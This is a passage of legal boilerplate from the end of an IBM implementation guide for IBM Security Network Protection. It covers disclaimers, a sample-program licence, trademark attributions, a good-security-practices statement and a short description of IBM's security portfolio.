the results obtained in other operating environments may vary significantly. Some
measurements may have been made on development-level systems and there is no guarantee
that these measurements will be the same on generally available systems. Furthermore, some
measurement may have been estimated through extrapolation. Actual results may vary. Users of
this document should verify the applicable data for their specific environment.
Information concerning non-IBM products was obtained from the suppliers of those products,
their published announcements or other publicly available sources. IBM has not tested those
products and cannot confirm the accuracy of performance, compatibility or any other claims
related to non-IBM products. Questions on the capabilities of non-IBM products should be
addressed to the suppliers of those products.
All statements regarding IBM's future direction or intent are subject to change or withdrawal
without notice, and represent goals and objectives only.
All IBM prices shown are IBM's suggested retail prices, are current and are subject to change
without notice. Dealer prices may vary.
This information is for planning purposes only. The information herein is subject to change before
the products described become available.
This information contains examples of data and reports used in daily business operations. To
illustrate them as completely as possible, the examples include the names of individuals,
companies, brands, and products. All of these names are fictitious and any similarity to the
names and addresses used by an actual business enterprise is entirely coincidental.
COPYRIGHT LICENSE:
This information contains sample application programs in source language, which illustrate
programming techniques on various operating platforms. You may copy, modify, and distribute
these sample programs in any form without payment to IBM, for the purposes of developing,
using, marketing or distributing application programs conforming to the application programming
interface for the operating platform for which the sample programs are written. These examples
have not been thoroughly tested under all conditions. IBM, therefore, cannot guarantee or imply
reliability, serviceability, or function of these programs. You may copy, modify, and distribute
these sample programs in any form without payment to IBM for the purposes of developing,
using, marketing, or distributing application programs conforming to IBM's application
programming interfaces.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
283
Implementation Guide for IBM Security Network Protection
Each copy or any portion of these sample programs or any derivative work, must include a
copyright notice as follows: © IBM 2014. Portions of this code are derived from IBM Corp.
Sample Programs. © Copyright IBM Corp 2014. All rights reserved. If you are viewing this
information in softcopy form, the photographs and color illustrations might not be displayed.
Trademarks
IBM, the IBM logo, and ibm.com are trademarks or registered trademarks of International
Business Machines Corp., registered in many jurisdictions worldwide. Other product and service
names might be trademarks of IBM or other companies. A current list of IBM trademarks is
available on the Web at Copyright and trademark information at ibm.com/legal/copytrade.shtml.
Trademarks or trademarks of Adobe Systems Incorporated in the United States, and/or other
countries.
Linux is a registered trademark of Linus Torvalds in the United States, other countries, or both.
Skype, Microsoft, Windows, Windows NT, and the Windows logo are trademarks of Microsoft
Corporation in the United States, other countries, or both.
Java and all Java-based trademarks and logos are trademarks or registered trademarks of
Oracle and/or its affiliates.
Flickr is a registered trademark of Yahoo.
Dropbox and the Dropbox logo are trademarks of Dropbox, Inc.
Firefox is a registered trademark of the Mozilla Foundation.
Twitter is a registered trademark of Twitter, Inc.
Google and Google+ are registered trademarks of Google Inc.
Metasploit is a registered trademark of Rapid7 Inc.
Apache is a registered trademark of The Apache Software Foundation.
Wireshark is a registered trademark of the Wireshark Foundation.
FireEye is a registered trademark of FireEye, Inc.
KALI LINUX is a trademark of Offensive Security.
284
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Statement of Good Security Practices
IT system security involves protecting systems and information through prevention, detection
and response to improper access from in and outside your enterprise. Improper access can
result in information being altered, destroyed, misappropriated or misused or can result in
damage to or misuse of your systems, including for use in attacks on others. No IT system or
product should be considered completely secure and no single product, service or security
measure can be completely effective in preventing improper use or access. IBM systems,
products and services are designed to be part of a comprehensive security approach, which will
necessarily involve additional operational procedures, and may require other systems, products
or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS,
PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE
IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
285
Implementation Guide for IBM Security Network Protection
For more information
To learn more about IBM Security Network Protection, visit: ibm.com/security
About IBM Security solutions
IBM offers one of the most advanced and integrated portfolios of enterprise security products
and services. The portfolio, supported by world-renowned X-Force research and development,
provides security intelligence to help organizations holistically protect their people,
infrastructures, data and applications, offering solutions for identity and access management,
database security, application development, risk management, endpoint management, network
security and more. These solutions enable organizations to effectively manage risk and
implement integrated security for mobile, cloud, social media and other enterprise business
architectures. IBM operates one of the world’s broadest security research, development and
delivery organizations, monitors 13 billion security events per day in more than 130 countries,
and holds more than 3,000 security patents.
© International Business Machines Corporation 2014
International Business Machines Corporation
New Orchard Road Armonk, NY 10504
Produced in the United States of America 02-2014
All Rights Reserved
References in this publication to IBM products and services do not imply that IBM intends to make them available in all countries in
which IBM operates.
286
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
© Copyright 2026 Paperzz